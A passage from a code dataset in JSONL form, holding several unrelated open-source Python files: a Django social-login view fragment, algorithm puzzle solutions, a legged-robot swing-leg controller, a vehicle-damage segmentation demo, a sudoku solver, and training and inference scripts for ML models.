self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n backend, access_token = serializer.get_data()\n social_data = backend.get_clean_data(access_token)\n social_auth = get_social_auth(social_data['uid'], backend.name)\n new = False\n\n if social_auth is None:\n user = get_user_by_email(social_data['email'])\n\n if user is None:\n user = create_user_social(social_data)\n new = True\n\n social_auth = create_social_auth(user, social_data['uid'], backend.name, social_data['avatar_url'])\n\n else:\n user = social_auth.user\n\n if user:\n django_login(request, user, backend='accounts.auth_backends.AuthenticationBackend')\n token, created = Token.objects.get_or_create(user=user)\n return self.get_response(request, token, new)\n\n return Response(status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"favourch/coretabs-academy","sub_path":"src/api/accounts/social/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71391606632","text":"import collections\nimport sys\nimport copy\ninput = sys.stdin.readline\nn,m = map(int,input().strip().split())\n\nboarda = [list(map(int,input().strip().split())) for _ in range(n)]\ncheck = [[0]*m for _ in range(n)]\nnx = [0,1,0,-1]\nny = [1,0,-1,0]\n\ndef go(board):\n nextBoard = [[0]*m for _ in range(n)]\n for i in range(n):\n for j in range(m):\n if board[i][j] > 0:\n ctn = 0\n for k in range(4):\n dx,dy = i+nx[k],j+ny[k]\n if 0 <= dx < n and 0 <= dy < m and board[dx][dy] == 0 :\n ctn += 1\n nextBoard[i][j] = max(0,board[i][j]-ctn)\n return nextBoard\n\ndef bfs(board):\n count = 0\n bb = copy.deepcopy(board)\n for i in range(n):\n for j in range(m):\n \n if bb[i][j] > 0 and count == 0:\n st = collections.deque()\n st.append((i,j))\n bb[i][j] = -1\n while st :\n x,y = st.popleft()\n for k in range(4):\n dx,dy = x+nx[k],y+ny[k]\n if 0 <= dx < n and 0 <= dy < m and bb[dx][dy] > 0 :\n st.append((dx,dy))\n bb[dx][dy] = -1\n count += 1\n if bb[i][j] > 0 and count > 0 :\n return False\n return True\nccc = 0\nwhile bfs(boarda):\n boarda = go(boarda)\n if boarda == check :\n ccc = 0\n break\n ccc += 1\n\nprint(ccc)","repo_name":"jjmin9797/algorithm","sub_path":"20220901/2573.py","file_name":"2573.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40349014584","text":"\"\"\"The swing leg controller class.\"\"\"\n# from absl import logging\n\nimport copy\nimport math\nimport numpy as np\nfrom typing import Any, Mapping, Sequence, Tuple\n\nfrom src.robots.motors import MotorCommand\nfrom src.convex_mpc_controller import gait_generator as gait_generator_lib\n\n# The position correction coefficients in Raibert's formula.\n_KP = np.array([0.01, 0.01, 0.01]) * 0.\n# At the end of swing, we leave a small clearance to prevent unexpected foot\n# collision.\n_FOOT_CLEARANCE_M = 0.01\n\n\ndef _gen_parabola(phase: float, start: float, mid: float, end: float) -> float:\n \"\"\"Gets a point on a parabola y = a x^2 + b x + c.\n\n The Parabola is determined by three points (0, start), (0.5, mid), (1, end) in\n the plane.\n\n Args:\n phase: Normalized to [0, 1]. A point on the x-axis of the parabola.\n start: The y value at x == 0.\n mid: The y value at x == 0.5.\n end: The y value at x == 1.\n\n Returns:\n The y value at x == phase.\n \"\"\"\n mid_phase = 0.5\n delta_1 = mid - start\n delta_2 = end - start\n delta_3 = mid_phase**2 - mid_phase\n coef_a = (delta_1 - delta_2 * mid_phase) / delta_3\n coef_b = (delta_2 * mid_phase**2 - delta_1) / delta_3\n coef_c = start\n\n return coef_a * phase**2 + coef_b * phase + coef_c\n\n\ndef _gen_swing_foot_trajectory(input_phase: float, start_pos: Sequence[float],\n end_pos: Sequence[float],\n foot_height: float) -> Tuple[float]:\n \"\"\"Generates the swing trajectory using a parabola.\n\n Args:\n input_phase: the swing/stance phase value between [0, 1].\n start_pos: The foot's position at the beginning of swing cycle.\n end_pos: The foot's desired position at the end of swing cycle.\n\n Returns:\n The desired foot position at the current phase.\n \"\"\"\n # We augment the swing speed using the below formula. For the first half of\n # the swing cycle, the swing leg moves faster and finishes 80% of the full\n # swing trajectory. The rest 20% of trajectory takes another half swing\n # cycle. Intuitely, we want to move the swing foot quickly to the target\n # landing location and stay above the ground, in this way the control is more\n # robust to perturbations to the body that may cause the swing foot to drop\n # onto the ground earlier than expected. This is a common practice similar\n # to the MIT cheetah and Marc Raibert's original controllers.\n phase = input_phase\n if input_phase <= 0.5:\n phase = 0.8 * math.sin(input_phase * math.pi)\n else:\n phase = 0.8 + (input_phase - 0.5) * 0.4\n\n x = (1 - phase) * start_pos[0] + phase * end_pos[0]\n y = (1 - phase) * start_pos[1] + phase * end_pos[1]\n mid = max(end_pos[2], start_pos[2]) + foot_height\n z = _gen_parabola(phase, start_pos[2], mid, end_pos[2])\n\n # PyType detects the wrong return type here.\n return (x, y, z) # pytype: disable=bad-return-type\n\n\n# def cubic_bezier(x0: Sequence[float], x1: Sequence[float],\n# t: float) -> Sequence[float]:\n# progress = t**3 + 3 * t**2 * (1 - t)\n# return x0 + progress * (x1 - x0)\n\n# def _gen_swing_foot_trajectory(input_phase: float, start_pos: Sequence[float],\n# end_pos: Sequence[float]) -> Tuple[float]:\n# max_clearance = 0.10\n# mid_z = max(end_pos[2], start_pos[2]) + max_clearance\n# mid_pos = (start_pos + end_pos) / 2\n# mid_pos[2] = mid_z\n# if input_phase < 0.5:\n# t = input_phase * 2\n# foot_pos = cubic_bezier(start_pos, mid_pos, t)\n# else:\n# t = input_phase * 2 - 1\n# foot_pos = cubic_bezier(mid_pos, end_pos, t)\n# return foot_pos\n\n\nclass RaibertSwingLegController:\n \"\"\"Controls the swing leg position using Raibert's formula.\n\n For details, please refer to chapter 2 in \"Legged robbots that balance\" by\n Marc Raibert. The key idea is to stablize the swing foot's location based on\n the CoM moving speed.\n\n \"\"\"\n def __init__(self, robot: Any, gait_generator: Any, state_estimator: Any,\n desired_speed: Tuple[float,\n float], desired_twisting_speed: float,\n desired_height: float, foot_landing_clearance: float,\n foot_height: float, use_raibert_heuristic: bool):\n \"\"\"Initializes the class.\n\n Args:\n robot: A robot instance.\n gait_generator: Generates the stance/swing pattern.\n state_estimator: Estiamtes the CoM speeds.\n desired_speed: Behavior parameters. X-Y speed.\n desired_twisting_speed: Behavior control parameters.\n desired_height: Desired standing height.\n foot_landing_clearance: The foot clearance on the ground at the end of\n the swing cycle.\n \"\"\"\n self._robot = robot\n self._state_estimator = state_estimator\n self._gait_generator = gait_generator\n self._last_leg_state = gait_generator.desired_leg_state\n self.desired_speed = np.array((desired_speed[0], desired_speed[1], 0))\n self.desired_twisting_speed = desired_twisting_speed\n self._desired_height = desired_height\n self._desired_landing_height = np.array(\n (0, 0, desired_height - foot_landing_clearance))\n\n self._phase_switch_foot_local_position = None\n self.foot_placement_position = np.zeros(12)\n self.use_raibert_heuristic = use_raibert_heuristic\n self._foot_height = foot_height\n self.reset(0)\n\n def reset(self, current_time: float) -> None:\n \"\"\"Called during the start of a swing cycle.\n\n Args:\n current_time: The wall time in seconds.\n \"\"\"\n del current_time\n self._last_leg_state = self._gait_generator.desired_leg_state\n self._phase_switch_foot_local_position = \\\n self._robot.foot_positions_in_base_frame.copy()\n\n def update(self, current_time: float) -> None:\n \"\"\"Called at each control step.\n Args:\n current_time: The wall time in seconds.\n \"\"\"\n del current_time\n new_leg_state = self._gait_generator.desired_leg_state\n # Detects phase switch for each leg so we can remember the feet position at\n # the beginning of the swing phase.\n for leg_id, state in enumerate(new_leg_state):\n if (state == gait_generator_lib.LegState.SWING\n and state != self._last_leg_state[leg_id]):\n self._phase_switch_foot_local_position[leg_id] = (\n self._robot.foot_positions_in_base_frame[leg_id])\n\n self._last_leg_state = copy.deepcopy(new_leg_state)\n\n @property\n def foot_height(self):\n return self._foot_height\n\n @foot_height.setter\n def foot_height(self, foot_height: float) -> None:\n self._foot_height = foot_height\n\n @property\n def foot_landing_clearance(self):\n return self._desired_height - self._desired_landing_height[2]\n\n @foot_landing_clearance.setter\n def foot_landing_clearance(self, landing_clearance: float) -> None:\n self._desired_landing_height = np.array(\n (0., 0., self._desired_height - landing_clearance))\n\n def get_action(self) -> Mapping[Any, Any]:\n com_velocity = self._state_estimator.com_velocity_body_frame\n com_velocity = np.array((com_velocity[0], com_velocity[1], 0))\n\n _, _, yaw_dot = self._robot.base_angular_velocity_body_frame\n hip_positions = self._robot.swing_reference_positions\n\n all_joint_angles = {}\n for leg_id, leg_state in enumerate(self._gait_generator.leg_state):\n if leg_state in (gait_generator_lib.LegState.STANCE,\n gait_generator_lib.LegState.EARLY_CONTACT,\n gait_generator_lib.LegState.LOSE_CONTACT):\n continue\n\n # For now we did not consider the body pitch/roll and all calculation is\n # in the body frame. TODO(b/143378213): Calculate the foot_target_position\n # in world frame and then project back to calculate the joint angles.\n hip_offset = hip_positions[leg_id]\n twisting_vector = np.array((-hip_offset[1], hip_offset[0], 0))\n hip_horizontal_velocity = com_velocity + yaw_dot * twisting_vector\n target_hip_horizontal_velocity = (\n self.desired_speed + self.desired_twisting_speed * twisting_vector)\n if self.use_raibert_heuristic or (\n not self.foot_placement_position.any()):\n # Use raibert heuristic to determine target foot position\n foot_target_position = (\n hip_horizontal_velocity *\n self._gait_generator.stance_duration[leg_id] / 2 - _KP *\n (target_hip_horizontal_velocity - hip_horizontal_velocity))\n foot_target_position = np.clip(foot_target_position,\n [-0.15, -0.1, -0.05], [0.15, 0.1, 0.05])\n foot_target_position = foot_target_position - \\\n self._desired_landing_height + \\\n np.array((hip_offset[0], hip_offset[1], 0))\n else:\n foot_target_position = self.foot_placement_position[\n leg_id] - self._desired_landing_height + np.array(\n (hip_offset[0], hip_offset[1], 0))\n\n # Compute target position compensation due to slope\n gravity_projection_vector = \\\n self._state_estimator.gravity_projection_vector\n multiplier = -self._desired_landing_height[\n 2] / gravity_projection_vector[2]\n foot_target_position[:2] += gravity_projection_vector[:2] * multiplier\n # logging.info(\"Compsenation: {}\".format(gravity_projection_vector[:2] *\n # multiplier))\n\n foot_position = _gen_swing_foot_trajectory(\n self._gait_generator.normalized_phase[leg_id],\n self._phase_switch_foot_local_position[leg_id], foot_target_position,\n self._foot_height)\n\n joint_ids, joint_angles = (\n self._robot.get_motor_angles_from_foot_position(\n leg_id, foot_position))\n # Update the stored joint angles as needed.\n for joint_id, joint_angle in zip(joint_ids, joint_angles):\n all_joint_angles[joint_id] = (joint_angle, leg_id)\n action = {}\n kps = self._robot.motor_group.kps\n kds = self._robot.motor_group.kds\n for joint_id, joint_angle_leg_id in all_joint_angles.items():\n leg_id = joint_angle_leg_id[1]\n action[joint_id] = MotorCommand(desired_position=joint_angle_leg_id[0],\n kp=kps[joint_id],\n desired_velocity=0,\n kd=kds[joint_id],\n desired_extra_torque=0)\n\n return action\n","repo_name":"yxyang/fast_and_efficient","sub_path":"src/convex_mpc_controller/raibert_swing_leg_controller.py","file_name":"raibert_swing_leg_controller.py","file_ext":"py","file_size_in_byte":10319,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"72"} +{"seq_id":"4109434298","text":"\n\ndef _get_caches_with_video_id(cache_descriptions, video_id):\n cache_ids = []\n for cache_id, video_ids in cache_descriptions.items():\n if video_id in video_ids:\n cache_ids.append(cache_id)\n return cache_ids\n\n\ndef _count_score(requests, endpoints, cache_descriptions):\n score = 0\n total_requests = 0\n for request in requests:\n endpoint = endpoints[request.endpoint_id]\n cache_ids = _get_caches_with_video_id(cache_descriptions, request.video_id)\n latencies = [endpoint.data_center_latency]\n for cache_id in cache_ids:\n if cache_id in endpoint.cache_latencies:\n latencies.append(endpoint.cache_latencies[cache_id])\n latency_diff = endpoint.data_center_latency - min(latencies)\n score += request.count * latency_diff\n total_requests += request.count\n return (score * 1000) // total_requests\n\n\ndef count_score(input, output):\n return _count_score(input.requests, input.endpoints, output)\n","repo_name":"dream-team-poland/gh2017q","sub_path":"src/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8075949588","text":"import gradio as gr\nimport numpy as np\nimport torch\nfrom PIL import Image, ImageDraw\nimport requests\nfrom transformers import SamModel, SamProcessor\nfrom transformers import CLIPSegProcessor, CLIPSegForImageSegmentation\nimport cv2\nfrom typing import List\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n#Load clipseg Model\nclip_processor = CLIPSegProcessor.from_pretrained(\"CIDAS/clipseg-rd64-refined\")\nclip_model = CLIPSegForImageSegmentation.from_pretrained(\"CIDAS/clipseg-rd64-refined\").to(device)\n\n# Load SAM model and processor\nmodel = SamModel.from_pretrained(\"facebook/sam-vit-base\").to(device)\nprocessor = SamProcessor.from_pretrained(\"facebook/sam-vit-base\")\n\ncache_data = None\n\n# Prompts to segment damaged area and car\nprompts = ['damaged', 'car']\ndamage_threshold = 0.4\nvehicle_threshold = 0.5\n\ndef bbox_normalization(bbox, width, height):\n height_coeff = height/352\n width_coeff = width/352\n normalized_bbox = [int(bbox[0]*width_coeff), int(bbox[1]*height_coeff),\n int(bbox[2]*width_coeff), int(bbox[3]*height_coeff)]\n return normalized_bbox\n\ndef bbox_area(bbox):\n area = (bbox[2]-bbox[0])*(bbox[3]-bbox[1])\n return area\n\ndef segment_to_bbox(segment_indexs):\n x_points = []\n y_points = []\n for y, list_val in enumerate(segment_indexs):\n for x, val in enumerate(list_val):\n if val == 1:\n x_points.append(x)\n y_points.append(y)\n return [np.min(x_points), np.min(y_points), np.max(x_points), np.max(y_points)]\n\ndef clipseg_prediction(image):\n inputs = processor(text=prompts, images=[image] * len(prompts), padding=\"max_length\", return_tensors=\"pt\")\n # predict\n with torch.no_grad():\n outputs = model(**inputs)\n preds = outputs.logits.unsqueeze(1)\n # Setting threshold and classify the image contains vehicle or not\n flat_preds = torch.sigmoid(preds.squeeze()).reshape((preds.shape[0], -1))\n\n # Initialize a dummy \"unlabeled\" mask with the threshold\n flat_damage_preds_with_treshold = torch.full((2, flat_preds.shape[-1]), damage_threshold)\n flat_vehicle_preds_with_treshold = torch.full((2, flat_preds.shape[-1]), vehicle_threshold)\n flat_damage_preds_with_treshold[1:2,:] = flat_preds[0] # damage\n flat_vehicle_preds_with_treshold[1:2,:] = flat_preds[1] # vehicle\n\n # Get the top mask index for each pixel\n damage_inds = torch.topk(flat_damage_preds_with_treshold, 1, dim=0).indices.reshape((preds.shape[-2], preds.shape[-1]))\n vehicle_inds = torch.topk(flat_vehicle_preds_with_treshold, 1, dim=0).indices.reshape((preds.shape[-2], preds.shape[-1]))\n\n # bbox creation\n damage_bbox = segment_to_bbox(damage_inds)\n vehicle_bbox = segment_to_bbox(vehicle_inds)\n\n # Vehicle checking\n if bbox_area(vehicle_bbox) > bbox_area(damage_bbox):\n return True, bbox_normalization(damage_bbox)\n else:\n return False, []\n \n\n@torch.no_grad()\ndef foward_pass(image_input: np.ndarray, points: List[List[int]]) -> np.ndarray:\n global cache_data\n image_input = Image.fromarray(image_input)\n inputs = processor(image_input, input_points=points, return_tensors=\"pt\").to(device)\n if not cache_data or not torch.equal(inputs['pixel_values'],cache_data[0]):\n embedding = model.get_image_embeddings(inputs[\"pixel_values\"])\n pixels = inputs[\"pixel_values\"]\n cache_data = [pixels, embedding]\n del inputs[\"pixel_values\"]\n\n outputs = model.forward(image_embeddings=cache_data[1], **inputs)\n masks = processor.image_processor.post_process_masks(\n outputs.pred_masks.cpu(), inputs[\"original_sizes\"].cpu(), inputs[\"reshaped_input_sizes\"].cpu()\n )\n masks = masks[0].squeeze(0).numpy().transpose(1, 2, 0)\n\n return masks\n\ndef main_func(inputs):\n \n image_input = inputs['image']\n classification, points = clipseg_prediction(image_input)\n if classification:\n masks = foward_pass(image_input, points)\n \n image_input = Image.fromarray(image_input)\n \n final_mask = masks[0]\n mask_colors = np.zeros((final_mask.shape[0], final_mask.shape[1], 3), dtype=np.uint8)\n mask_colors[final_mask, :] = np.array([[128, 0, 0]])\n return Image.fromarray((mask_colors * 0.6 + image_input * 0.4).astype('uint8'), 'RGB')\n else:\n return Image.fromarray(image_input)\n\ndef reset_data():\n global cache_data\n cache_data = None\n\nwith gr.Blocks() as demo:\n gr.Markdown(\"# Demo to run Vehicle damage detection\")\n gr.Markdown(\"\"\"This app uses the SAM model and clipseg model to get a vehicle damage area from image.\"\"\")\n with gr.Row():\n image_input = gr.Image()\n image_output = gr.Image()\n \n image_button = gr.Button(\"Segment Image\", variant='primary')\n\n image_button.click(main_func, inputs=image_input, outputs=image_output)\n image_input.upload(reset_data)\n\ndemo.launch()\n","repo_name":"abijithraaz/Vehicle-damage-detection","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15696065832","text":"import codecs\nimport json\nimport os\nfrom html.parser import HTMLParser\n\nDEVICE_TWEETS_DIR = './data/selected/device-tweets'\n\n\nclass LinkParser(HTMLParser):\n def __init__(self):\n\n HTMLParser.__init__(self)\n self.links = {}\n self.linkurl = ''\n\n def handle_starttag(self, tag, attrs):\n\n if tag == 'a':\n attrs = dict(attrs)\n if 'href' in attrs:\n self.linkurl = attrs['href']\n\n def handle_data(self, data):\n\n if self.linkurl:\n self.links[self.linkurl] = data\n self.linkurl = ''\n\n\ndef main():\n parser = LinkParser()\n\n for year in os.listdir(DEVICE_TWEETS_DIR):\n\n lang_year_path = os.path.join(DEVICE_TWEETS_DIR, year)\n\n for month in os.listdir(lang_year_path):\n\n lang_month_path = os.path.join(lang_year_path, month)\n\n for file in os.listdir(lang_month_path):\n\n file_path = os.path.join(lang_month_path, file)\n with codecs.open(file_path, 'r+') as f:\n tweets = json.load(f)\n for i in range(len(tweets['tweets'])):\n parser.feed(tweets['tweets'][i]['source'])\n tweets['tweets'][i]['source'] = \\\n list(parser.links.copy().values())[0]\n parser.links.clear()\n\n for i in range(len(tweets['stats'])):\n stat = []\n for k, v in tweets['stats'][i]['device_stat'].items():\n parser.feed(k)\n stat.append(\n {'source': list(parser.links.copy().values())[\n 0], 'count': v})\n parser.links.clear()\n\n tweets['stats'][i]['device_stat'] = stat\n\n f.seek(0)\n json.dump(tweets, f, ensure_ascii=False)\n f.truncate()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hakatashi/emoji-vision","sub_path":"parse_link.py","file_name":"parse_link.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13493641778","text":"from pprint import pprint as pp\n\nVALID_DIGITS = {\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"}\n\ndef solve_sudoku(sudoku):\n def _get_row(coords):\n row_index, _ = coords\n return set(sudoku[row_index])\n\n def _get_column(coords):\n _, col_index = coords\n return {r[col_index] for r in sudoku}\n\n def _3_by_3_coords(coords):\n def _(idx):\n if 0 <= idx <= 2:\n result = (0, 3)\n elif 3 <= idx <= 5:\n result = (3, 6)\n else:\n result = (6, 9)\n return result\n row_idx, col_idx = coords\n return _(row_idx), _(col_idx)\n\n def _get_3_by_3(coords):\n row_index, col_index = coords\n assert 0 <= row_index <= 8 and 0 <= col_index <= 8\n\n _3_by_3_rows, _3_by_3_cols = _3_by_3_coords(coords)\n\n _3_by_3 = set()\n for i in range(*_3_by_3_rows):\n for j in range(*_3_by_3_cols):\n _3_by_3.add(sudoku[i][j])\n\n return _3_by_3\n\n def _construct_possibilities_hashtable():\n hashtable = {}\n next_pick = []\n for i in range(len(sudoku)):\n for j in range(len(sudoku[0])):\n if sudoku[i][j] != \"0\":\n continue\n\n temp1 = VALID_DIGITS - set(filter(lambda x: x != 0, _get_row((i, j))))\n temp2 = VALID_DIGITS - set(filter(lambda x: x != 0, _get_column((i, j))))\n temp3 = VALID_DIGITS - set(filter(lambda x: x != 0, _get_3_by_3((i, j))))\n\n hashtable[(i, j)] = temp1.intersection(temp2, temp3)\n if len(hashtable[(i, j)]) == 1:\n next_pick.append((i, j))\n\n return hashtable, next_pick\n\n possibilities, coords_to_be_picked = _construct_possibilities_hashtable()\n\n while coords_to_be_picked:\n coord = coords_to_be_picked.pop(0)\n only_possibility = possibilities[coord].pop()\n sudoku[coord[0]][coord[1]] = only_possibility\n\n for row in range(9):\n temp_coord = (row, coord[1])\n if temp_coord not in possibilities or temp_coord in coords_to_be_picked:\n continue\n\n possibilities[temp_coord].discard(only_possibility)\n if len(possibilities[temp_coord]) == 1:\n coords_to_be_picked.append(temp_coord)\n\n for column in range(9):\n temp_coord = (coord[0], column)\n if temp_coord not in possibilities or temp_coord in coords_to_be_picked:\n continue\n\n possibilities[temp_coord].discard(only_possibility)\n if len(possibilities[temp_coord]) == 1:\n coords_to_be_picked.append(temp_coord)\n\n _3_by_3_rows, _3_by_3_cols = _3_by_3_coords(coord)\n\n for i in range(*_3_by_3_rows):\n for j in range(*_3_by_3_cols):\n if (i, j) not in possibilities or (i, j) in coords_to_be_picked:\n continue\n possibilities[(i, j)].discard(only_possibility)\n if len(possibilities[(i, j)]) == 1:\n coords_to_be_picked.append((i, j))\n\n\nif __name__ == \"__main__\":\n board = [[\"5\", \"3\", \"0\", \"0\", \"7\", \"0\", \"0\", \"0\", \"0\"],\n [\"6\", \"0\", \"0\", \"1\", \"9\", \"5\", \"0\", \"0\", \"0\"],\n [\"0\", \"9\", \"8\", \"0\", \"0\", \"0\", \"0\", \"6\", \"0\"],\n [\"8\", \"0\", \"0\", \"0\", \"6\", \"0\", \"0\", \"0\", \"3\"],\n [\"4\", \"0\", \"0\", \"8\", \"0\", \"3\", \"0\", \"0\", \"1\"],\n [\"7\", \"0\", \"0\", \"0\", \"2\", \"0\", \"0\", \"0\", \"6\"],\n [\"0\", \"6\", \"0\", \"0\", \"0\", \"0\", \"2\", \"8\", \"0\"],\n [\"0\", \"0\", \"0\", \"4\", \"1\", \"9\", \"0\", \"0\", \"5\"],\n [\"0\", \"0\", \"0\", \"0\", \"8\", \"0\", \"0\", \"7\", \"9\"]]\n\n solve_sudoku(board)\n pp(board)\n\n","repo_name":"InderdeepSync/algoexpert_problems","sub_path":"solve_sudoku.py","file_name":"solve_sudoku.py","file_ext":"py","file_size_in_byte":3727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40422747574","text":"#l = [(2, 5), (1, 2), (4, 4), (2, 3), (2, 1)]\r\nl =[]\r\nn = int(input(\"length of list:\"))\r\nfor i in range(n):\r\n k =[]\r\n for j in range(2):\r\n k.append(int(input(\"enter tuple elements\")))\r\n l.append(tuple(k))\r\nprint(l)\r\ni =0\r\nj=0\r\nwhile j < len(l):\r\n for i in range(len(l)-1):\r\n if(l[i][1] > l[i+1][1]):\r\n temp =l[i]\r\n l[i] = l[i+1]\r\n l[i+1] = temp\r\n j+=1\r\nprint(l)","repo_name":"Sejarla/EdYoda-Assignments","sub_path":"assignment2.1.py","file_name":"assignment2.1.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40695303665","text":"import os\nimport torch\nimport pytorch_lightning as pl\n\nfrom torch.utils.data.dataloader import DataLoader\n\nfrom model import GeneratorModel, Encoder, RationaleSystem\n\nfrom argparse import ArgumentParser\n\n\nfrom torchtext.data import Field, BucketIterator\nfrom torchtext.datasets import IMDB\nfrom torchtext.vocab import FastText\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\n\nfrom data import IMDBDataModule\n\ndef general_args():\n ap = ArgumentParser()\n \n ap.add_argument(\"--no-generator\", action=\"store_true\", default=False)\n\n ap.add_argument('--learning-rate', type=float, default=1e-3)\n ap.add_argument(\"--batch-size\", type=int, default=32)\n\n ap.add_argument(\"--rnn-type\", type=str, choices=['gru','cnn'])\n\n ap.add_argument('--rnn-layers', type=int, default=2)\n ap.add_argument('--rnn-dim', type=int, default=128)\n ap.add_argument('--dropout', type=float, default=0.2)\n\n ap.add_argument(\"--cnn-filters\", type=str, default=\"3,4,5\")\n\n ap.add_argument(\"--patience\", default=3, type=int)\n \n\n ap.add_argument(\"--neptune-project\", type=str, default=None)\n ap.add_argument(\"--neptune-key\", type=str, default=None)\n\n return ap\n\ndef main():\n parser = general_args()\n parser = pl.Trainer.add_argparse_args(parser)\n parser = RationaleSystem.add_model_specific_args(parser)\n \n\n args = parser.parse_args()\n\n neptune_logger = None\n\n if args.neptune_project is not None:\n from pytorch_lightning.loggers.neptune import NeptuneLogger\n\n neptune_logger = NeptuneLogger(\n api_key=args.neptune_key,\n project_name=args.neptune_project,\n params=vars(args)\n )\n\n \n\n data = IMDBDataModule(args.batch_size)\n data.prepare_data()\n\n # if args.no_generator:\n # gen = None\n # else:\n # gen = GeneratorModel(args, \n # embeddings=data.text_field.vocab.vectors, \n # padding_idx=data.text_field.vocab.stoi[''])\n\n\n # enc = Encoder(args,\n # embeddings=data.text_field.vocab.vectors, \n # num_classes=len(data.label_field.vocab), \n # padding_idx=data.text_field.vocab.stoi[''])\n\n model = RationaleSystem(args, embeddings=data.text_field.vocab.vectors, \n num_classes=len(data.label_field.vocab), \n padding_idx=data.text_field.vocab.stoi[''])\n\n checkpoint_callback = pl.callbacks.ModelCheckpoint(\n filepath=os.getcwd(),\n save_top_k=3,\n save_weights_only=True,\n verbose=True,\n monitor='val_acc',\n mode='max',\n prefix=''\n )\n\n earlystop_callback = EarlyStopping(monitor='val_acc', patience=args.patience)\n\n\n trainer = pl.Trainer.from_argparse_args(args, callbacks=[checkpoint_callback, earlystop_callback], logger=neptune_logger)\n\n trainer.fit(model, data)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"ravenscroftj/roberta-rationale-extraction","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41913435193","text":"from ugens.ugen import Ugen, ugen_parser\nimport sys\n\ndef add(inputs):\n if all([type(k) in (Ugen, str, float) for k in inputs]):\n print('types', len(inputs)//4, inputs)\n while len(inputs)>1:\n inputs_ = []\n for x in range(0, len(inputs), 4):\n inputs_.append(inputs[x:x+4])\n inputs = inputs_\n print('inputs', inputs)\n\nif __name__ == '__main__':\n\n args_def = {\n \"in\":{\n \"help\": \"The array of channels or arrays.\",\n \"default\":None,\n \"nargs\": '+'\n }\n }\n\n parse = ugen_parser(args_def)\n\n if len(sys.argv[1:])==1:\n print(sys.argv[1:][0],file=sys.stderr)\n else:\n argv = ['0', '--in']\n\n for arg in sys.argv[1:]:\n argv.append(arg)\n\n args = parse(argv)\n add(args['in'])\n print(args)\n\n\n","repo_name":"rexmalebka/bash_sc","sub_path":"ugens/operators/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40824361797","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 25 23:28:19 2022\n\n@author: a975193\n\"\"\"\n\nimport cv2\nimport time\nimport glob\nimport numpy as np\nimport tensorflow.compat.v1 as tf\n\ninput_folder = \"dataset/images/\"\nmodel_path = \"saved_model/saved_model\"\noutput_folder = \"output_folder/\"\n\ncolors = [(255,0,0), (229, 52, 235), (235, 85, 52),\n (14, 115, 51), (14, 115, 204)]\n\ncv2.namedWindow(\"display\", cv2.WINDOW_NORMAL)\n\ndef process_keypoint(kp, kp_s, h, w, img):\n for i, kp_data in enumerate(kp):\n cv2.circle(img,(int(kp_data[1]*w), int(kp_data[0]*h)),5,colors[i],-1)\n return img\n\nwith tf.Session(graph = tf.Graph()) as sess:\n tf.saved_model.loader.load(sess, ['serve'], model_path)\n graph = tf.get_default_graph()\n input_tensor = graph.get_tensor_by_name(\"serving_default_input_tensor:0\")\n det_score = graph.get_tensor_by_name(\"StatefulPartitionedCall:6\")\n det_class = graph.get_tensor_by_name(\"StatefulPartitionedCall:2\")\n det_boxes = graph.get_tensor_by_name(\"StatefulPartitionedCall:0\")\n det_numbs = graph.get_tensor_by_name(\"StatefulPartitionedCall:7\")\n det_keypoint = graph.get_tensor_by_name(\"StatefulPartitionedCall:4\")\n det_keypoint_score = graph.get_tensor_by_name(\"StatefulPartitionedCall:3\")\n print(\"Model Loaded\")\n for image_path in glob.glob(input_folder+\"*.jpg\"):\n filename = image_path.split(\"/\")[-1]\n frame = cv2.imread(image_path)\n if frame is not None:\n frame = cv2.resize(frame,(512,512),interpolation = cv2.INTER_AREA)\n height, width, _ = frame.shape\n image_exp_dims = np.expand_dims(frame, axis=0)\n start_time = time.time()\n score,classes,boxes,nums_det, \\\n keypoint,keypoint_score = sess.run([det_score, det_class, det_boxes, \n det_numbs,det_keypoint,det_keypoint_score], \n feed_dict={input_tensor:image_exp_dims})\n for i in range(int(nums_det[0])):\n if(score[0][i]*100 > 50): \n per_box = boxes[0][i]\n y1 = int(per_box[0]*height)\n x1 = int(per_box[1]*width)\n y2 = int(per_box[2]*height)\n x2 = int(per_box[3]*width)\n \n p1 = (x1,y1)\n p2 = (x2,y2)\n cv2.rectangle(frame, p1, p2, (0,255,0), 3)\n frame = process_keypoint(keypoint[0][0], keypoint_score[0], height, width, frame)\n cv2.imshow(\"display\",frame)\n cv2.imwrite(output_folder+filename, frame)\n print(\"Time: \", time.time() - start_time)\n cv2.waitKey(1)\n else:\n print(\"break\")\n 